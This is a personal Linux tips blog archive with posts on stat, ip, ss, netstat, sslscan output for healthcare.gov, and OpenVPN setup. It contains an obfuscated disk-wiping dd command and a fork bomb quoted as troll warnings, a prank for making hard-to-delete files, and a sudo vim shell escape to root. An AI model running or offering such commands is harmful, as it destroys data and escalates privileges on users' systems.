Archive for the ‘Debian-Testing’ Category:

London underground signs powered by Linux.

London underground Linux displays.

London underground Linux displays.

This is a photograph of an information display in the London Underground. This one is running Linux apparently, a file-system is missing and when the system boots it cannot find the file-system and this results in the system switching to runlevel 6 and rebooting. Someone might have stolen a hard drive from a machine and this results in the Linux machine failing to boot. So if you have a Linux machine, make sure the physical access to the server is restricted to avoid security issues. This is yet another Linux sighting.

Using the Linux stat command to get information about a file.

The Linux stat command allows information to be shown about a file on your file-system.

jason@darknet:~/Documents$ stat /bin/ls
  File: ‘/bin/ls’
  Size: 118280    	Blocks: 232        IO Block: 4096   regular file
Device: 801h/2049d	Inode: 10616940    Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-02-01 08:55:40.145487505 +1100
Modify: 2015-03-15 02:47:04.000000000 +1100
Change: 2016-01-19 13:22:58.462724858 +1100
 Birth: -

The example above shows the size of the file, the access, change and modification times and inode information.

The -t parameter shows the information in terse form.

jason@darknet:~/Documents$ stat -t /bin/ls
/bin/ls 118280 232 81ed 0 0 801 10616940 1 0 0 1454277340 1426348024 1453170178 0 4096

Use the -f parameter to get information about the filesystem instead of a file.

jason@darknet:~/Documents$ stat -f /
  File: "/"
    ID: 5f5a0e0ff79afa26 Namelen: 255     Type: ext2/ext3
Block size: 4096       Fundamental block size: 4096
Blocks: Total: 112936344  Free: 111033927  Available: 105291323
Inodes: Total: 28696576   Free: 28486575

This is a very useful Linux command, this will return useful filesystem information.

How to update packages on your Debian GNU/Linux system.

The packages on your Debian system must be kept up to date to ensure the security concerns are addressed. Use this command to install any pending updates.

sudo apt-get update; sudo apt-get upgrade

The Debian user may also use this command.

sudo aptitude update; sudo aptitude safe-upgrade

Both of these commands will update all of the software on a Debian system to the latest versions.

Website links changed.

I have changed the name of one of my categories on my website. If you cannot find an old post, please use the search function to find it again. I have to wait until Google indexes my site again.

Some awesome UNIX tricks. Create a file that is hard to delete.

Here is one for any experimenters out there…

It is possible to create files which simply cannot be deleted from the standard shell. To do this you will have to physically create the file using a script or a text editor, and you will have to use a sequence of control characters which cannot be typed from the shell. Try things like Ctrl-h (this is the code for the delete key). A file created with the file-name Ctrl-h would not be able to be deleted from the shell, unless you used wildcards. So, make it a nice long series of characters, so that to delete the file, the user has no choice but to individually copy all his files elsewhere, then delete everything in his directory, and then copy all his files back. This is one of my favorites… gets them every time!

The following script file is an example which will create a file with the name Ctrl-h. You MUST type this file in using the vi editor or similar. *****If you are not very good with vi, type “man vi” and print the help file…it even contains stuff that I find useful now and then.*****

type the following in vi…

echo'' > 'a^h'

***NOTE…to get the ^h (this really means ctrl-h) from VIM type:

Ctrl v
Ctrl h

The Ctrl-v instructs vi to take the next character as a ASCII character, and not to interpret it.

Change the access on the file you just created and now execute it. It will create a file which looks like it is called a, but try to delete it !. Use wildcards if you really want to delete it.

List the inode numbers of files in a directory.

Use the ls -il command to list the inode numbers of files in a directory.

jason@ubuntu:~/Documents$ ls -il
total 20
405605 -rwxrwxr-x 1 jason jason 8920 Jan 11 15:29 a.out
405685 -rw-rw-r-- 1 jason jason  960 Jan 11 15:29 ip.c
405815 -rw-rw-r-- 1 jason jason 1279 Jan 11 15:22 my.c
405604 -rw-rw-r-- 1 jason jason    0 Jan 11 14:41 my.c~

Then use this command to delete the file by inode number.

find . -inum 405604 -exec rm -i {} \;

This is the best way to delete a file that has a strange file-name, just use the filesystem inode.

jason@ubuntu:~/Documents$ find . -inum 405604 -exec rm -i {} \;
rm: remove regular empty file ‘./my.c~’? y

So, if someone creates a file with a strange name, it can still be easily deleted.

Like this command. This will create a file named -f.

jason@ubuntu:~/Documents$ echo "me" > "-f"

This is evil, but not the end of the world…

jason@ubuntu:~/Documents$ ls -iluh
total 24K
405605 -rwxrwxr-x 1 jason jason 8.8K Jan 11 15:29 a.out
406568 -rw-rw-r-- 1 jason jason    3 Jan 12 10:36 -f
405685 -rw-rw-r-- 1 jason jason  960 Jan 11 15:29 ip.c
405815 -rw-rw-r-- 1 jason jason 1.3K Jan 11 15:21 my.c

This file can still be deleted with this neat trick.

jason@ubuntu:~/Documents$ find . -inum 406568 -exec rm -i {} \;
rm: remove regular file ‘./-f’? y

An even more evil command…

jason@ubuntu:~/Documents$ touch "\+Xy \+\8"

This is still not a barrier. But these are good commands to know, some malicious user might use these commands on your system to create a file that you cannot delete, and it is good to know that these files can be removed easily with the right knowledge.

Get SSL information from a website using sslscan.

The sslscan command for the Kali Linux penetration testing distribution is very useful for gaining an insight into the SSL configuration of a web site.

Here is example usage on healthcare.gov…

root@darknet:~# sslscan healthcare.gov
Version: 1.10.5-static
OpenSSL 1.0.2e-dev xx XXX xxxx
 
Testing SSL server healthcare.gov on port 443
 
  TLS renegotiation:
Secure session renegotiation supported
 
  TLS Compression:
Compression disabled
 
  Heartbleed:
TLS 1.0 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.2 not vulnerable to heartbleed
 
  Supported Server Cipher(s):
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA                 
 
  Preferred Server Cipher(s):
TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
 
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048
 
Subject:  www.healthcare.gov
Altnames: DNS:aca.api.healthcare.gov, DNS:cciio.cms.gov, DNS:eidm.cms.gov, DNS:styleguide.healthcare.gov, DNS:reminder.healthcare.gov, DNS:geo.api.healthcare.gov, DNS:ahrcvo.cms.gov, DNS:calt.cms.gov, DNS:portal.cms.gov, DNS:confluence.cms.gov, DNS:maps.cms.gov, DNS:cicd.cms.gov, DNS:tmdsmdr.aws.healthcare.gov, DNS:www.errp.gov, DNS:assets.cms.gov, DNS:ci.cms.gov, DNS:downloads.cms.gov, DNS:partnershippledge.healthcare.gov, DNS:www.hospitalcompare.hhs.gov, DNS:marketplace.api.healthcare.gov, DNS:ratereview.healthcare.gov, DNS:wr.healthcare.gov, DNS:login.healthcare.gov, DNS:marketplace-int.api.healthcare.gov, DNS:monitor.healthcare.gov, DNS:www.cciio.cms.gov, DNS:ayudalocal.cuidadodesalud.gov, DNS:api.healthcare.gov, DNS:assets.healthcare.gov, DNS:www.stopmedicarefraud.gov, DNS:signup.healthcare.gov, DNS:billing.healthcare.gov, DNS:prodprime.cuidadodesalud.gov, DNS:splunk.cms.gov, DNS:localhelp.healthcare.gov, DNS:tmdsm.aws.healthcare.gov, DNS:hfpp.cms.gov, DNS:jira.cms.gov, DNS:stopmedicarefraud.gov, DNS:errp.gov, DNS:companyprofile.healthcare.gov, DNS:crowd.cms.gov, DNS:healthcare.gov, DNS:finder.healthcare.gov, DNS:marketplace.cms.gov, DNS:companyprofiles.healthcare.gov, DNS:nagios.healthcare.gov, DNS:ahrc.cms.gov, DNS:search.healthcare.gov, DNS:openpaymentsdata.cms.gov, DNS:prodprime.healthcare.gov, DNS:scclia.cms.gov, DNS:vpn.aws.healthcare.gov, DNS:hipchat.cms.gov, DNS:splunk.healthcare.gov, DNS:data.healthcare.gov, DNS:cuidadodesalud.gov, DNS:status.healthcare.gov, DNS:developer.cms.gov, DNS:eap.cms.gov, DNS:pcip.gov, DNS:github.cms.gov, DNS:api.finder.healthcare.gov, DNS:hospitalcompare.hhs.gov, DNS:go.healthcare.gov, DNS:search.stopmedicarefraud.gov, DNS:www.pcip.gov, DNS:www.cuidadodesalud.gov, DNS:www.healthcare.gov
Issuer:   GeoTrust SSL CA - G3

This shows some comprehensive information about the website SSL configuration.

To test only TLS ciphers, use this command line parameter.

root@darknet:~# sslscan --tlsall healthcare.gov
Version: 1.10.5-static
OpenSSL 1.0.2e-dev xx XXX xxxx
 
Testing SSL server healthcare.gov on port 443
 
  TLS renegotiation:
Secure session renegotiation supported
 
  TLS Compression:
Compression disabled
 
  Heartbleed:
TLS 1.0 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.2 not vulnerable to heartbleed
 
  Supported Server Cipher(s):
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA                 
 
  Preferred Server Cipher(s):
TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
 
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048
 
Subject:  www.healthcare.gov
Altnames: DNS:aca.api.healthcare.gov, DNS:cciio.cms.gov, DNS:eidm.cms.gov, DNS:styleguide.healthcare.gov, DNS:reminder.healthcare.gov, DNS:geo.api.healthcare.gov, DNS:ahrcvo.cms.gov, DNS:calt.cms.gov, DNS:portal.cms.gov, DNS:confluence.cms.gov, DNS:maps.cms.gov, DNS:cicd.cms.gov, DNS:tmdsmdr.aws.healthcare.gov, DNS:www.errp.gov, DNS:assets.cms.gov, DNS:ci.cms.gov, DNS:downloads.cms.gov, DNS:partnershippledge.healthcare.gov, DNS:www.hospitalcompare.hhs.gov, DNS:marketplace.api.healthcare.gov, DNS:ratereview.healthcare.gov, DNS:wr.healthcare.gov, DNS:login.healthcare.gov, DNS:marketplace-int.api.healthcare.gov, DNS:monitor.healthcare.gov, DNS:www.cciio.cms.gov, DNS:ayudalocal.cuidadodesalud.gov, DNS:api.healthcare.gov, DNS:assets.healthcare.gov, DNS:www.stopmedicarefraud.gov, DNS:signup.healthcare.gov, DNS:billing.healthcare.gov, DNS:prodprime.cuidadodesalud.gov, DNS:splunk.cms.gov, DNS:localhelp.healthcare.gov, DNS:tmdsm.aws.healthcare.gov, DNS:hfpp.cms.gov, DNS:jira.cms.gov, DNS:stopmedicarefraud.gov, DNS:errp.gov, DNS:companyprofile.healthcare.gov, DNS:crowd.cms.gov, DNS:healthcare.gov, DNS:finder.healthcare.gov, DNS:marketplace.cms.gov, DNS:companyprofiles.healthcare.gov, DNS:nagios.healthcare.gov, DNS:ahrc.cms.gov, DNS:search.healthcare.gov, DNS:openpaymentsdata.cms.gov, DNS:prodprime.healthcare.gov, DNS:scclia.cms.gov, DNS:vpn.aws.healthcare.gov, DNS:hipchat.cms.gov, DNS:splunk.healthcare.gov, DNS:data.healthcare.gov, DNS:cuidadodesalud.gov, DNS:status.healthcare.gov, DNS:developer.cms.gov, DNS:eap.cms.gov, DNS:pcip.gov, DNS:github.cms.gov, DNS:api.finder.healthcare.gov, DNS:hospitalcompare.hhs.gov, DNS:go.healthcare.gov, DNS:search.stopmedicarefraud.gov, DNS:www.pcip.gov, DNS:www.cuidadodesalud.gov, DNS:www.healthcare.gov
Issuer:   GeoTrust SSL CA - G3

To ask for an OCSP Stapling Request, use this command.

root@darknet:~# sslscan --ocsp healthcare.gov

With the –ssl3 parameter, the user can check just for the sslv3 implementation.

root@darknet:~# sslscan --ssl3 healthcare.gov
Version: 1.10.5-static
OpenSSL 1.0.2e-dev xx XXX xxxx
 
Testing SSL server healthcare.gov on port 443
 
  TLS renegotiation:
Secure session renegotiation supported
 
  TLS Compression:
Compression disabled
 
  Heartbleed:
All TLS protocols disabled, cannot check for heartbleed.
 
  Supported Server Cipher(s):
 
  Preferred Server Cipher(s):
 
  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048
 
Subject:  www.healthcare.gov
Altnames: DNS:aca.api.healthcare.gov, DNS:cciio.cms.gov, DNS:eidm.cms.gov, DNS:styleguide.healthcare.gov, DNS:reminder.healthcare.gov, DNS:geo.api.healthcare.gov, DNS:ahrcvo.cms.gov, DNS:calt.cms.gov, DNS:portal.cms.gov, DNS:confluence.cms.gov, DNS:maps.cms.gov, DNS:cicd.cms.gov, DNS:tmdsmdr.aws.healthcare.gov, DNS:www.errp.gov, DNS:assets.cms.gov, DNS:ci.cms.gov, DNS:downloads.cms.gov, DNS:partnershippledge.healthcare.gov, DNS:www.hospitalcompare.hhs.gov, DNS:marketplace.api.healthcare.gov, DNS:ratereview.healthcare.gov, DNS:wr.healthcare.gov, DNS:login.healthcare.gov, DNS:marketplace-int.api.healthcare.gov, DNS:monitor.healthcare.gov, DNS:www.cciio.cms.gov, DNS:ayudalocal.cuidadodesalud.gov, DNS:api.healthcare.gov, DNS:assets.healthcare.gov, DNS:www.stopmedicarefraud.gov, DNS:signup.healthcare.gov, DNS:billing.healthcare.gov, DNS:prodprime.cuidadodesalud.gov, DNS:splunk.cms.gov, DNS:localhelp.healthcare.gov, DNS:tmdsm.aws.healthcare.gov, DNS:hfpp.cms.gov, DNS:jira.cms.gov, DNS:stopmedicarefraud.gov, DNS:errp.gov, DNS:companyprofile.healthcare.gov, DNS:crowd.cms.gov, DNS:healthcare.gov, DNS:finder.healthcare.gov, DNS:marketplace.cms.gov, DNS:companyprofiles.healthcare.gov, DNS:nagios.healthcare.gov, DNS:ahrc.cms.gov, DNS:search.healthcare.gov, DNS:openpaymentsdata.cms.gov, DNS:prodprime.healthcare.gov, DNS:scclia.cms.gov, DNS:vpn.aws.healthcare.gov, DNS:hipchat.cms.gov, DNS:splunk.healthcare.gov, DNS:data.healthcare.gov, DNS:cuidadodesalud.gov, DNS:status.healthcare.gov, DNS:developer.cms.gov, DNS:eap.cms.gov, DNS:pcip.gov, DNS:github.cms.gov, DNS:api.finder.healthcare.gov, DNS:hospitalcompare.hhs.gov, DNS:go.healthcare.gov, DNS:search.stopmedicarefraud.gov, DNS:www.pcip.gov, DNS:www.cuidadodesalud.gov, DNS:www.healthcare.gov
Issuer:   GeoTrust SSL CA - G3

Type man sslscan for more information.

Commands not to run on a Linux machine.

This is a good example of a command not to run on a Linux machine. This is commonly posted as a troll.

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

And this is what it actually does.

jason@ubuntu:~$ echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p
dd if=/dev/zero of=/dev/sda count=100 bs=1M

This will corrupt your hard drive and the Linux user will lose all of their data.

Here is another command that is commonly posted as a troll.

:(){ :|:& };:

This is a fork bomb, this will constantly spawn new processes until your system slows to a crawl. Always be careful of commands posted in less than reputable forums. If they are obfuscated like the xxd example, then do not run them, even if you are not using root or if you do not have sudo enabled.

There are trolls that tell people to delete System32 on Windows, but apparently this does not work as well as people think. The proper command will not even delete files as they are locked whilst Windows is running. The user would need to boot from a Linux live disc and then delete that Windows folder. So be careful when looking for help on websites like 4chan. They might give you something like this as a “helpful” post.

'Helpful' 4chan post.

‘Helpful’ 4chan post.

How to use the ip command to bring down an interface on RHEL.

The ip command is a useful alternative to the ifconfig command and allows the user to manage network interfaces. This is a good way to use the command line to bring network interfaces up or down. In this example I am bringing the network interface down.

[root@localhost jason]# ip link set eno16777736 down
[root@localhost jason]# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eno16777736: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel state DOWN mode DEFAULT qlen 1000
    link/ether 00:0c:29:47:5e:b4 brd ff:ff:ff:ff:ff:ff
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN mode DEFAULT 
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel master virbr0 state DOWN mode DEFAULT qlen 500
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff

Now I bring the interface back up again.

[root@localhost jason]# ip link set eno16777736 up
[root@localhost jason]# ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eno16777736: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT qlen 1000
    link/ether 00:0c:29:47:5e:b4 brd ff:ff:ff:ff:ff:ff
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN mode DEFAULT 
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel master virbr0 state DOWN mode DEFAULT qlen 500
    link/ether 52:54:00:c1:70:73 brd ff:ff:ff:ff:ff:ff

The ip link show command will print information about the network interfaces.

ubuntu ~ $ ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 06:d6:3a:a8:82:13 brd ff:ff:ff:ff:ff:ff
3: tun1194: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 100
    link/none

The command ip addr show dev eth0 will only show IP address information for the interface supplied, in this case it is eth0.

ubuntu ~ $ ip addr show dev eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 06:d6:3a:a8:82:13 brd ff:ff:ff:ff:ff:ff
    inet 172.31.20.16/20 brd 172.31.31.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::4d6:3aff:fea8:8213/64 scope link
       valid_lft forever preferred_lft forever

This command will display IP multicast addresses for a particular interface.

ubuntu ~ $ ip maddr show dev eth0
2:      eth0
        link  01:00:5e:00:00:01
        link  33:33:00:00:00:01
        link  33:33:ff:a8:82:13
        inet  224.0.0.1
        inet6 ff02::1:ffa8:8213
        inet6 ff02::1
        inet6 ff01::1

I found this information on this useful ip command cheat-sheet from Redhat: https://access.redhat.com/sites/default/files/attachments/rh_ip_command_cheatsheet_1214_jcs_print.pdf.

How to get an OpenVPN server working on Ubuntu 14.04.

This guide, [openvpn.net] has a good guide to setting up an OpenVPN server on a Linux machine. I used this guide as the other guides online are not as good and often do not lead to a satisfactory result.

I am using one on Linux and I can connect to it on my Windows machine and get an IP of 10.8.0.6.

Connected to my VPN and getting an IP address.

Connected to my VPN and getting an IP address.

Ensure this option is set to 1 to ensure that packet forwarding is enabled on the system. This would be desired for our VPN connection.

# Disables packet forwarding
net.ipv4.ip_forward = 1

Copy all of your keys onto your Windows machine into a new folder and then run CMD as an Administrator. Then type openvpn client.conf to attempt to run the client configuration and connect to your VPN. If you are successful, you will see the output in the screenshot above. Type ipconfig to check that you are getting a proper IP address. This is easy when you are following a proper tutorial and the keys are properly generated. The best way to create a Virtual Private Network is to use the 2048 bit encryption instead of 1024. This will greatly increase security exponentially. And do not use a PPTP VPN, this is not as secure.

To create VPN keys quickly, type sudo apt-get install easy-rsa openvpn.

Then copy the /usr/share/doc/openvpn/examples/easy-rsa directory to your home directory. Thins contains the scripts necessary to create a useful VPN configuration.

To ensure the consistent use of values when generating the Public Key Infrastructure, set the default values to be used by the PKI generating scripts. Edit ~/easy-rsa/vars and set these values at a minimum.

  • KEY_COUNTRY
  • KEY_PROVINCE
  • KEY_CITY
  • KEY_ORG
  • KEY_EMAIL

Another thing to check is that you are using 2048 bit encryption. Set this option in vars as well.

# Increase this to 2048 if you
# are paranoid.  This will slow
# down TLS negotiation performance
# as well as the one-time DH parms
# generation process.
export KEY_SIZE=2048

Once this is complete, load the values.

source ./vars

And then remove any previously generated certificates.

./clean-all

Then generate the Certificate Authority (CA) certificate with this command.

./build-ca

Build a server key with this command. Where foobar is your server hostname. Do not enter a challenge password or company name when the script prompts you for one. This will cause much heartache later.

./build-key-server foobar

Now generate the Diffie-Hellman parameters .pem file needed by the server.

./build-dh

Now build a key for the client computer to use when connecting to your OpenVPN server.

./build-key mycomputer1

Now you can copy these keys to the client computer and test the connection. There is some information about routed lans on this page: https://community.openvpn.net/openvpn/wiki/RoutedLans. This will help when setting up routing for your VPN.

Rosehosting also offer a simple OpenVPN installation script for creating a new OpenVPN instance on Ubuntu and getting a new user created.

View it here: https://www.rosehosting.com/blog/openvpn-setup-script-for-debian-and-ubuntu/.

The best tutorial I found to install FreePBX on Ubuntu 14.04 LTS server.

This is the best tutorial I have found that allowed me to install FreePBX on an Ubuntu 14.04 instance on an Amazon AWS instance. I tried a few and this one really did work for me after following all of the steps and exercising patience.

http://wiki.freepbx.org/display/HTGS/Installing+FreePBX+12+on+Ubuntu+Server+14.04+LTS.

FreePBX is a very useful tool for setting up a free VOIP system for cheap telephony over the Internet. But it must be installed from source so that everything works well together. The only PPA I could find was for Ubuntu Hardy and this is obviously far too old to be practical or secure.

Some miscellaneous Linux tips for Ubuntu and Linux Mint users.

If you are starting Firefox from a terminal window where you have specified the proxy settings, and you have the use system proxy settings option ticked, you will not need to set the proxy within Firefox. That is a very cool tip indeed.

If you need to set the proxy before using apt, you will not be successful when you type sudo apt-get install foo. Type sudo su - and then specify the required proxy settings so it will be picked up by apt.

I installed Ubuntu from the minimal installation ISO for Ubuntu 14.04 and I did not get the proper resolution for the virtual consoles and Xorg. I fixed this by editing the /etc/default/grub file and specifying the resolution there.

Uncomment this line and set the desired resolution. This fixed my issue.


GRUB_GFXMODE=1366x768

Another way to run a command as the root user using su-to-root.


homer@ubuntu:~$ su-to-root -c ls
About to execute ls.
This command needs root privileges to be executed.
Using sudo...
Enter homer password at prompt.
Desktop Documents Downloads

How to install kernel headers for your currently installed kernel. Using backticks makes this very easy, you may embed the output of a command into a one-liner.


homer@ubuntu:~$ sudo apt-get install linux-headers-`uname -r`
Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-3.13.0-32-generic is already the newest version.
linux-headers-3.13.0-32-generic set to manually installed.
0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.

Another way to get a root shell using VIM and sudo.

Type sudo vim foo.txt to open a text file named foo.txt as the superuser.

now in command mode: type: !/bin/sh and hit ENTER. This will give you a root prompt that you may use to enter and run any command that you wish. Very cool exploit indeed. I found this here: http://www.computersecuritystudent.com/UNIX/SUDO/lesson1/.

There is more information about sudo exploits here: http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/.

There is another method here that uses less: http://www.computersecuritystudent.com/UNIX/SUDO/lesson2/.

The ss command. A very useful way to find open and listening ports on a Linux system.

The ss command for Linux allows a user to list all listening ports on a Linux system.

This command lists all listening TCP ports.

homer@deusexmachina ~ $ ss -l -t
State       Recv-Q Send-Q                          Local Address:Port                              Peer Address:Port   
LISTEN      0      1                                   127.0.0.1:4101                                         *:*       
LISTEN      0      50                                          *:netbios-ssn                                      *:*       
LISTEN      0      128                                         *:sunrpc                                       *:*       
LISTEN      0      128                                 127.0.0.1:ipp                                          *:*       
LISTEN      0      128                                         *:https                                        *:*       
LISTEN      0      50                                          *:microsoft-ds                                      *:*       
LISTEN      0      50                                         :::netbios-ssn                                     :::*       
LISTEN      0      128                                        :::sunrpc                                      :::*       
LISTEN      0      128                                       ::1:ipp                                         :::*       
LISTEN      0      128                                        :::https                                       :::*       
LISTEN      0      50                                         :::microsoft-ds                                     :::*

And this is how to list all listening UDP ports.

homer@deusexmachina ~ $ ss -l -u
State       Recv-Q Send-Q                          Local Address:Port                              Peer Address:Port   
UNCONN      0      0                                           *:bootpc                                       *:*       
UNCONN      0      0                                           *:sunrpc                                       *:*       
UNCONN      0      0                               192.168.100.4:ntp                                          *:*       
UNCONN      0      0                                   127.0.0.1:ntp                                          *:*       
UNCONN      0      0                                           *:ntp                                          *:*       
UNCONN      0      0                             192.168.100.255:netbios-ns                                      *:*       
UNCONN      0      0                               192.168.100.4:netbios-ns                                      *:*       
UNCONN      0      0                                           *:netbios-ns                                      *:*       
UNCONN      0      0                             192.168.100.255:netbios-dgm                                      *:*       
UNCONN      0      0                               192.168.100.4:netbios-dgm                                      *:*       
UNCONN      0      0                                           *:netbios-dgm                                      *:*       
UNCONN      0      0                                           *:12931                                        *:*       
UNCONN      0      0                                           *:913                                          *:*       
UNCONN      0      0                                           *:mdns                                         *:*       
UNCONN      0      0                                           *:1900                                         *:*       
UNCONN      0      0                                           *:60439                                        *:*       
UNCONN      0      0                                          :::sunrpc                                      :::*       
UNCONN      0      0                   fe80::fa1a:67ff:fe10:b163:ntp                                         :::*       
UNCONN      0      0                             fe80::7a94:7b57:ntp                                         :::*       
UNCONN      0      0                        2001:470:1f06:1b5::2:ntp                                         :::*       
UNCONN      0      0                                         ::1:ntp                                         :::*       
UNCONN      0      0                                          :::ntp                                         :::*       
UNCONN      0      0                                          :::53609                                       :::*       
UNCONN      0      0                                          :::913                                         :::*       
UNCONN      0      0                                          :::mdns                                        :::*       
UNCONN      0      0                                          :::1865                                        :::*

The output of the ss command is very much like the familiar netstat command; but this command has greater capabilities.

Type: ss -a to list listening and non-listening ports.

The ss -i command will list all internal TCP information. This is therefore a very useful alternative to the traditionally used netstat utility.

Useful networking commands for listing open ports and listening services.

To print a list of all open ports and established TCP connections, type this command.

homer@deusexmachina /etc/asterisk $ netstat  -vatn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:4101          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2000            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN
tcp        0    256 192.168.100.4:443       153.107.97.168:53761    ESTABLISHED
tcp      328      0 192.168.100.4:36294     192.168.100.1:139       ESTABLISHED
tcp6       0      0 :::139                  :::*                    LISTEN
tcp6       0      0 :::111                  :::*                    LISTEN
tcp6       0      0 ::1:631                 :::*                    LISTEN
tcp6       0      0 :::443                  :::*                    LISTEN
tcp6       0      0 :::445                  :::*                    LISTEN

To list all open UDP connections, use this command.

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 0.0.0.0:68              0.0.0.0:*
